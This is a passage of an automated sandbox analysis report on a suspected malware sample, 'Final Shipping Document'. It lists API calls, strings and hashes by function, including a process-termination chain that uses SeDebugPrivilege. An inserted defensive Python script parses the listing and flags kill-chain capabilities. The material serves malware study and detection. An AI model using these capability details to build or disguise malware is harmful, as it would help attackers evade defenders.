                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                            • Instruction ID: ece1dbab26eeaaaec49efb2728a2e7ef71d93d73df16c9ffcd4624f50f2ef86a
                                                            • Opcode Fuzzy Hash: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                            • Instruction Fuzzy Hash: 6201D4313A4610BBFB2067699CCEF5D3F59DB4EB12F100001F318BE0D1C9E22444EA69
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01449,?,?,00000000), ref: 00C0180C
                                                            • HeapAlloc.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01813
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01828
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C01449,?,?,00000000), ref: 00C01830
                                                            • DuplicateHandle.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01833
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01843
                                                            • GetCurrentProcess.KERNEL32(00C01449,00000000,?,00C01449,?,?,00000000), ref: 00C0184B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C0184E
                                                            • CreateThread.KERNEL32(00000000,00000000,00C01874,00000000,00000000,00000000), ref: 00C01868
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                            • Instruction ID: 72f6bdec9f375b66c51fbb3272d5422e9d29d486a310ac1aab4dd2b27ba9100c
                                                            • Opcode Fuzzy Hash: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                            • Instruction Fuzzy Hash: AF01BBB5250308BFE710ABA5DC8DF6F7BACEB89B11F018411FA05EB1A1CA70D810DB20
                                                            APIs
                                                              • Part of subcall function 00C0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                              • Part of subcall function 00C0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                              • Part of subcall function 00C0D4DC: CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A16D
                                                            • GetLastError.KERNEL32 ref: 00C2A180
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A1B3
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2A268
                                                            • GetLastError.KERNEL32(00000000), ref: 00C2A273
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                            • Instruction ID: 1b0dc1764e1c8acc037251bb68776f494cd4069bf3c6a20dd192d499e9f2acce
                                                            • Opcode Fuzzy Hash: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                            • Instruction Fuzzy Hash: BB618070208252EFD710DF19D494F19BBE1AF45318F19849CE46A8BBA3C772ED49CB92
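The entry above (Toolhelp32 snapshot, Process32FirstW, OpenProcess with desired access 00000001, TerminateProcess, and the string SeDebugPrivilege) is the kind of function worth pulling out of a report of this length mechanically. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own API-listing line format, decodes the first OpenProcess argument against the PROCESS_TERMINATE access-right bit (0x0001 in winnt.h), and flags an entry as a process-kill chain. The sample input is copied from the two entries above; the parser and the capability rules are this editor's assumptions about how to triage such listings, not a Joe Sandbox feature.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: the APIs and Similarity lines of two function
# entries, copied from the report listing in its own line format.
SAMPLE = """\
APIs
  • Part of subcall function 00C0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
  • Part of subcall function 00C0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
  • Part of subcall function 00C0D4DC: CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A16D
• GetLastError.KERNEL32 ref: 00C2A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2A268
• GetLastError.KERNEL32(00000000), ref: 00C2A273
• CloseHandle.KERNEL32(00000000), ref: 00C2A2C4
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C33925
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C33954
• _wcslen.LIBCMT ref: 00C33999
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

PROCESS_TERMINATE = 0x0001  # access-right bit from winnt.h


@dataclass
class Call:
    name: str
    module: str
    args: list              # raw hex strings; '?' means the sandbox could not resolve it
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the call happens inside a subcall


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""


def parse_entries(text):
    """Split report text into function entries, one per 'APIs' header."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif s.startswith("• String ID:"):
            body = s[len("• String ID:"):].strip()
            cur.strings = body.split("$") if body else []   # '$' separates strings
        elif s.startswith("• API String ID:"):
            cur.api_string_id = s[len("• API String ID:"):].strip()
    return entries


def arg_has_bit(arg, bit):
    """True only when the argument was resolved and has the bit set."""
    return arg != "?" and (int(arg, 16) & bit) != 0


def assess(entry):
    """Capability rules (assumed triage heuristics, not sandbox signatures)."""
    names = [c.name for c in entry.calls]
    opens = [c for c in entry.calls if c.name == "OpenProcess"]
    f = {
        "enumerates_processes": "CreateToolhelp32Snapshot" in names and "Process32FirstW" in names,
        "opens_with_terminate_right": bool(opens) and all(
            c.args and arg_has_bit(c.args[0], PROCESS_TERMINATE) for c in opens),
        "terminates_process": "TerminateProcess" in names,
        "references_debug_privilege": "SeDebugPrivilege" in entry.strings,
    }
    f["process_kill_chain"] = f["opens_with_terminate_right"] and f["terminates_process"]
    return f


def triage(text):
    """Return (api_string_id, findings) for every entry that trips a rule."""
    out = []
    for e in parse_entries(text):
        f = assess(e)
        if any(f.values()):
            out.append((e.api_string_id, f))
    return out


if __name__ == "__main__":
    for api_string_id, findings in triage(SAMPLE):
        print(api_string_id, {k: v for k, v in findings.items() if v})
```

Run it over the whole report text rather than the excerpt to list every entry that trips a rule. One caveat applies to any rule of this kind: the report flags the sample as a compiled AutoIt script, and a chain like this is what the AutoIt runtime's own ProcessClose built-in looks like, so a hit shows the capability is present in the binary, not that the embedded script necessarily calls it.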
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C33925
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C3393A
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C33954
                                                            • _wcslen.LIBCMT ref: 00C33999
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C339C6
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C339F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcslen
                                                            • String ID: SysListView32
                                                            • API String ID: 2147712094-78025650
                                                            • Opcode ID: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                            • Instruction ID: 5f8de08b4c8f9d5369882384cd686e0e0613b2f81c97c99417f86c1425ea3b94
                                                            • Opcode Fuzzy Hash: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                            • Instruction Fuzzy Hash: B341A271A10358ABEB219F64CC49FEE77A9EF08350F140566F958E7281D7719A80CB90
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C0BCFD
                                                            • IsMenu.USER32(00000000), ref: 00C0BD1D
                                                            • CreatePopupMenu.USER32 ref: 00C0BD53
                                                            • GetMenuItemCount.USER32(015E64B8), ref: 00C0BDA4
                                                            • InsertMenuItemW.USER32(015E64B8,?,00000001,00000030), ref: 00C0BDCC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: 40c00c8ec68707233edcfe95bcc7a7d3b267b1282b13287443f4e5fb65edc79c
                                                            • Instruction ID: e5edddcef9b9b26098d7913b86c5cab91f5c7d3654895076842968b391fccd47
                                                            • Opcode Fuzzy Hash: 40c00c8ec68707233edcfe95bcc7a7d3b267b1282b13287443f4e5fb65edc79c
                                                            • Instruction Fuzzy Hash: 57518C70A003069BDB10DFA9D8C8BAEFBF4AF55314F148259E421A72D9D770AE41CB61
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C0C913
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                            • Instruction ID: 872879ab4180d8a3c65eeebec9937cfa2c0aacb40b2a0dff6a58136f16b22063
                                                            • Opcode Fuzzy Hash: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                            • Instruction Fuzzy Hash: B2113A32689306BAE7149B149CC3EAE37DCDF15715F20423EF904A62C2E7B09F009268
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$LocalTime
                                                            • String ID:
                                                            • API String ID: 952045576-0
                                                            • Opcode ID: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                            • Instruction ID: e74766a4bbe17c79024f64d9dfc7a1eb7de6d35cf1cf71a6b7ffac112478f028
                                                            • Opcode Fuzzy Hash: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                            • Instruction Fuzzy Hash: 45419265C1021875CB11EBF4C88AEDFB7E8AF45710F5088AAE528E3161FB34E755C3A5
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BBF953
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BFF3D1
                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BFF454
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                            • Instruction ID: c4729fdd6e982c54826d47325259358d8c59b5962af019d005f1069eb194cfcb
                                                            • Opcode Fuzzy Hash: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                            • Instruction Fuzzy Hash: 1941D131618682BBC7398B298CC87BE7BD2EF56314F1444BCE5C663660C6B2E884DB11
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00C32D1B
                                                            • GetDC.USER32(00000000), ref: 00C32D23
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C32D2E
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C32D3A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C32D76
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C32D87
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C32DC2
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C32DE1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                            • Instruction ID: 31b6261eee0d0d822aabf925e3bada44ca674d44cc2840e4f167ce5f724c925c
                                                            • Opcode Fuzzy Hash: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                            • Instruction Fuzzy Hash: 6C317C72221214BFEF218F50CC8AFEF3BA9EF09715F044055FE08AA291C6759C50CBA4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                            • Instruction ID: 0e0e51fd9415383db205f976afe1ce0d1aab85cbedaf7a5e969b43b3f7a9985e
                                                            • Opcode Fuzzy Hash: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                            • Instruction Fuzzy Hash: D321DA61A50A09B7D31459159E82FBB339CEF61388F440438FD156A7C2F722EE11CDA9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: c0ef5ec75cf0e22c7c6bfb26b65a2a87196fa7e260377a278b04b79b5c053bb4
                                                            • Instruction ID: 0e189781317020aa115ecfd1aee7172217ba0e17408f8f714a2675da2399b822
                                                            • Opcode Fuzzy Hash: c0ef5ec75cf0e22c7c6bfb26b65a2a87196fa7e260377a278b04b79b5c053bb4
                                                            • Instruction Fuzzy Hash: F5D1D271A0062A9FDF10CFA8D880BAEB7B5FF48344F148069E925AB690D770DE41CB90
                                                            APIs
                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BE15CE
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1651
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BE17FB,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16E4
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16FB
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1777
                                                            • __freea.LIBCMT ref: 00BE17A2
                                                            • __freea.LIBCMT ref: 00BE17AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                            • String ID:
                                                            • API String ID: 2829977744-0
                                                            • Opcode ID: b61e09aad5fe8f7402f09b68be0d070350510a971fd8af3a386c17d0663499f8
                                                            • Instruction ID: 884f689c7cfdc4124126ce3f8af008d29f15bd189863d0e9900f84f949d1b2a5
                                                            • Opcode Fuzzy Hash: b61e09aad5fe8f7402f09b68be0d070350510a971fd8af3a386c17d0663499f8
                                                            • Instruction Fuzzy Hash: 0D91A4B1E102969EDB208F7AC881EEEBBF5EF59710F284A99E812E7141D735DD40C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2610073882-625585964
                                                            • Opcode ID: 52d53692aae49a323b84d791e24cea554bb303c359c169b1c50a9c997d0426c5
                                                            • Instruction ID: b8148b542e4f29d9486c804ff52910afd6125c426bf15db2828104e75e2f9e98
                                                            • Opcode Fuzzy Hash: 52d53692aae49a323b84d791e24cea554bb303c359c169b1c50a9c997d0426c5
                                                            • Instruction Fuzzy Hash: BE918471A00225AFDF24CFA5DC84FAEBBB8EF46B14F108559F525AB280D7709945CFA0
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C1125C
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C11284
                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C112A8
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C112D8
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C1135F
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C113C4
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C11430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            • Opcode ID: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                            • Instruction ID: 4179aa64dee31607349ad856738b32bf37165cd2b4fcd80a86ada50d9c580290
                                                            • Opcode Fuzzy Hash: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
